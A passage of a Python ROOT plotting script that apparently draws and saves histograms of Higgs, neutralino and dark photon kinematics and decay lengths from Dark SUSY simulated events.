# if dimuons[2][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[2][6])
# if dimuons[2][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[2][6])
# if dimuons[3][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[3][6])
# if dimuons[3][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[3][6])
# dimuons5GeV = []
# for i in range(0, len(dimuons)):
# # select only dimuons with invariant mass less than 5 GeV
# if dimuons[i][6] < 5.0: dimuons5GeV.append( dimuons[i] )
#
# nDimuons5GeV = len(dimuons5GeV)
#
# is2DiMuons = False
# nMuJetsContainMu17 = 0
# m_threshold_Mu17_pT = 17.0
# m_threshold_Mu17_eta = 0.9
# m_randomSeed = 1234
# if nDimuons5GeV == 2:
# # select only dimuons that do NOT share muons
# if dimuons5GeV[0][0] != dimuons5GeV[1][0] and dimuons5GeV[0][0] != dimuons5GeV[1][1] and dimuons5GeV[0][1] != dimuons5GeV[1][1] and dimuons5GeV[0][1] != dimuons5GeV[1][0]:
# isDimuon0ContainMu17 = False
# if ( muons[ dimuons5GeV[0][0] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[0][0] ][7] < m_threshold_Mu17_eta ) or ( muons[ dimuons5GeV[0][1] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[0][1] ][7] < m_threshold_Mu17_eta ):
# isDimuon0ContainMu17 = True
# if ( muons[ dimuons5GeV[1][0] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[1][0] ][7] < m_threshold_Mu17_eta ) or ( muons[ dimuons5GeV[1][1] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[1][1] ][7] < m_threshold_Mu17_eta ):
# isDimuon1ContainMu17 = True
# if isDimuon0ContainMu17 == True and isDimuon1ContainMu17 == False:
# is2DiMuons = True
# muJetC = dimuons5GeV[0]
# muJetF = dimuons5GeV[1]
# elif isDimuon0ContainMu17 == False and isDimuon1ContainMu17 == True:
# is2DiMuons = True
# muJetC = dimuons5GeV[1]
# muJetF = dimuons5GeV[0]
# elif isDimuon0ContainMu17 == True and isDimuon1ContainMu17 == True:
# is2DiMuons = True
# if(ROOT.TRandom3(m_randomSeed).Integer(2) == 0):
# muJetC = dimuons5GeV[0]
# muJetF = dimuons5GeV[1]
# else:
# muJetC = dimuons5GeV[1]
# muJetF = dimuons5GeV[0]
# else:
# is2DiMuons = False
#
# is2DiMuonsMassOK = False
# if is2DiMuons:
# massC = muJetC[6]
# massF = muJetF[6]
# h_m1_vs_m2.Fill(massC, massF)
# h_m1.Fill( massC )
# h_m2.Fill( massF )
# if abs(massC-massF) < (0.13 + 0.065*(massC+massF)/2.0):
# is2DiMuonsMassOK = True
#
# if is2DiMuonsMassOK == True:
# nEventsOK = nEventsOK + 1
print "nEvents = ", nEvents
print "nEventsOK = ", nEventsOK
################################################################################
# Draw histograms
################################################################################
Etmiss_dummy.Draw()
Etmiss.DrawNormalized("same")
scaleAxisY(Etmiss,Etmiss_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.C")
h_higgs_pT_dummy.Draw()
h_higgs_pT.DrawNormalized("same")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.C")
h_higgs_pZ_dummy.Draw()
#h_higgs_pZ.DrawNormalized("same")
plotOverflow(h_higgs_pZ)
scaleAxisY(h_higgs_pZ,h_higgs_pZ_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.C")
#h_higgs_Eta_dummy.Draw()
#h_higgs_Eta.DrawNormalized("same")
#info.Draw()
#txtHeader.Draw()
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.png")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.png")
h_higgs_Phi_dummy.Draw()
h_higgs_Phi.DrawNormalized("same")
#scaleAxisY(h_higgs_Phi,h_higgs_Phi_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.C")
cnv.SetLogx()
h_higgs_M_dummy.Draw()
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_M_dummy.Draw("same")
h_higgs_M.DrawNormalized("same")
h_higgs_M.GetXaxis().SetMoreLogLabels()
h_higgs_M.DrawNormalized("same")
info.Draw()
txtHeader.Draw()
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_M_dummy.Draw("same")
h_higgs_M.DrawNormalized("same")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.C")
cnv.SetLogx(0)
h_higgs_p_dummy.Draw()
#h_higgs_p.DrawNormalized("same")
plotOverflow(h_higgs_p)
scaleAxisY(h_higgs_p,h_higgs_p_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.C")
h_n1_1_pT_dummy.Draw()
h_n1_1_pT.DrawNormalized("same")
h_n1_2_pT.DrawNormalized("same")
scaleAxisY(h_n1_1_pT, h_n1_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_pT,"1st neutralino","L")
legend.AddEntry(h_n1_2_pT,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.C")
h_n1_1_pZ_dummy.Draw()
plotOverflow(h_n1_1_pZ)
plotOverflow(h_n1_2_pZ)
scaleAxisY(h_n1_1_pZ,h_n1_1_pZ_dummy)
#h_n1_1_pZ.DrawNormalized("same")
#h_n1_2_pZ.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_pZ,"1st neutralino","L")
legend.AddEntry(h_n1_2_pZ,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.C")
h_n1_1_Eta_dummy.Draw()
h_n1_1_Eta.DrawNormalized("same")
h_n1_2_Eta.DrawNormalized("same")
scaleAxisY(h_n1_1_Eta,h_n1_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_Eta,"1st neutralino","L")
legend.AddEntry(h_n1_2_Eta,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.C")
h_n1_1_Phi_dummy.Draw()
h_n1_1_Phi.DrawNormalized("same")
h_n1_2_Phi.DrawNormalized("same")
scaleAxisY(h_n1_1_Phi,h_n1_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_Phi,"1st neutralino","L")
legend.AddEntry(h_n1_2_Phi,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.C")
h_n1_1_p_dummy.Draw()
plotOverflow(h_n1_1_p)
plotOverflow(h_n1_2_p)
scaleAxisY(h_n1_1_p,h_n1_1_p_dummy)
#h_n1_1_p.DrawNormalized("same")
#h_n1_2_p.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_p,"1st neutralino","L")
legend.AddEntry(h_n1_2_p,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.C")
h_n1_1_M_dummy.Draw()
h_n1_1_M.DrawNormalized("same")
#h_n1_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_n1_1_M,"1st neutralino (leading p_{T})","L")
#legend.AddEntry(h_n1_2_M,"2nd neutralino","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.C")
h_nD_1_pT_dummy.Draw()
#h_nD_1_pT.DrawNormalized("same")
#h_nD_2_pT.DrawNormalized("same")
plotOverflow(h_nD_1_pT)
plotOverflow(h_nD_2_pT)
scaleAxisY(h_nD_2_pT,h_nD_1_pT)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_pT,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_pT,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.C")
h_nD_1_pZ_dummy.Draw()
h_nD_1_pZ.DrawNormalized("same")
h_nD_2_pZ.DrawNormalized("same")
scaleAxisY(h_nD_2_pZ,h_nD_1_pZ_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_pZ,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_pZ,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.C")
h_nD_1_Eta_dummy.Draw()
h_nD_1_Eta.DrawNormalized("same")
h_nD_2_Eta.DrawNormalized("same")
scaleAxisY(h_nD_1_Eta,h_nD_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_Eta,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_Eta,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.C")
h_nD_1_Phi_dummy.Draw()
h_nD_1_Phi.DrawNormalized("same")
h_nD_2_Phi.DrawNormalized("same")
scaleAxisY(h_nD_1_Phi,h_nD_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_Phi,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_Phi,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.C")
h_nD_1_p_dummy.Draw()
h_nD_1_p.DrawNormalized("same")
h_nD_2_p.DrawNormalized("same")
scaleAxisY(h_nD_2_p,h_nD_1_p_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_p,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_p,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.C")
h_nD_1_M_dummy.Draw()
h_nD_1_M.DrawNormalized("same")
#h_nD_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_nD_1_M,"1st n_{D} (leading p_{T})","L")
#legend.AddEntry(h_nD_2_M,"2nd n_{D}","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.C")
h_gammaD_cT_dummy.Draw()
normConstant = integral(h_gammaD_cT)
#print normConstant
h_gammaD_cT.Scale(1/normConstant)
h_gammaD_cT.Draw("same")
scaleAxisYcT(h_gammaD_cT,h_gammaD_cT_dummy)
funct = ROOT.TF1("funct","exp(-x/"+ lifetime_GammaD_Legend +")/("+ lifetime_GammaD_Legend + "*(1 - exp(-" + str(cTlim) + "/" + lifetime_GammaD_Legend + ")))",cTlow,cTlim)
funct.SetNpx(10000)
funct.Draw("same")
h_gammaD_cT.SetTitleOffset(1.5, "Y")
h_gammaD_cT.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_cT.SetYTitle("Normalized Fraction of events")
h_gammaD_cT.SetTitleSize(0.05,"Y")
info.Draw()
txtHeader.Draw()
eqn = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
eqn.SetFillColor(ROOT.kWhite)
eqn.SetFillStyle(0)
eqn.SetBorderSize(0)
eqn.SetTextFont(42)
eqn.SetTextSize(0.02777778)
eqn.SetMargin(0.13)
eqn.AddEntry(funct, "#frac{e^{-x/"+ lifetime_GammaD_Legend +"}}{"+ lifetime_GammaD_Legend + " (1 - e^{-" + str(cTlim) + "/" + lifetime_GammaD_Legend + "})}", "L")
eqn.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.C")
h_gammaD_cT_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_lab)
h_gammaD_cT_lab.Scale(1/normConstant)
h_gammaD_cT_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_lab,h_gammaD_cT_lab_dummy)
#h_gammaD_cT_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_lab.Fit("myfit").Draw("same")
h_gammaD_cT_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_lab.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_cT_lab.SetYTitle("Events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.C")
h_gammaD_cT_XY_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_XY_lab)
h_gammaD_cT_XY_lab.Scale(1/normConstant)
h_gammaD_cT_XY_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_XY_lab,h_gammaD_cT_XY_lab_dummy)
#h_gammaD_cT_XY_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L_{xy}")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_XY_lab.Fit("myfit").Draw("same")
h_gammaD_cT_XY_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_XY_lab.SetXTitle("L_{xy} of #gamma_{D} [mm]")
h_gammaD_cT_XY_lab.SetYTitle("Events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.C")
h_gammaD_cT_Z_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_Z_lab)
h_gammaD_cT_Z_lab.Scale(1/normConstant)
h_gammaD_cT_Z_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_Z_lab,h_gammaD_cT_Z_lab_dummy)
#h_gammaD_cT_Z_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L_{z}")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_Z_lab.Fit("myfit").Draw("same")
h_gammaD_cT_Z_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_Z_lab.SetXTitle("L_{z} of #gamma_{D} [mm]")
h_gammaD_cT_Z_lab.SetYTitle("Events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.C")
h_gammaD_1_cT_dummy.Draw()
normConstant = integral(h_gammaD_1_cT)
h_gammaD_1_cT.Scale(1/normConstant)
h_gammaD_1_cT.Draw("same")
normConstant2 = integral(h_gammaD_2_cT)
h_gammaD_2_cT.Scale(1/normConstant2)
h_gammaD_2_cT.Draw("same")
scaleAxisYcT(h_gammaD_2_cT,h_gammaD_1_cT_dummy)
#h_gammaD_1_cT.DrawNormalized("same")
#h_gammaD_2_cT.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.C")
h_gammaD_1_cT_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_lab)
h_gammaD_1_cT_lab.Scale(1/normConstant)
h_gammaD_1_cT_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_lab)
h_gammaD_2_cT_lab.Scale(1/normConstant2)
h_gammaD_2_cT_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_lab,h_gammaD_1_cT_lab_dummy)
#h_gammaD_1_cT_lab.DrawNormalized("same")
#h_gammaD_2_cT_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.C")
h_gammaD_1_cT_XY_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_XY_lab)
h_gammaD_1_cT_XY_lab.Scale(1/normConstant)
h_gammaD_1_cT_XY_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_XY_lab)
h_gammaD_2_cT_XY_lab.Scale(1/normConstant2)
h_gammaD_2_cT_XY_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_XY_lab,h_gammaD_1_cT_XY_lab_dummy)
#h_gammaD_1_cT_XY_lab.DrawNormalized("same")
#h_gammaD_2_cT_XY_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
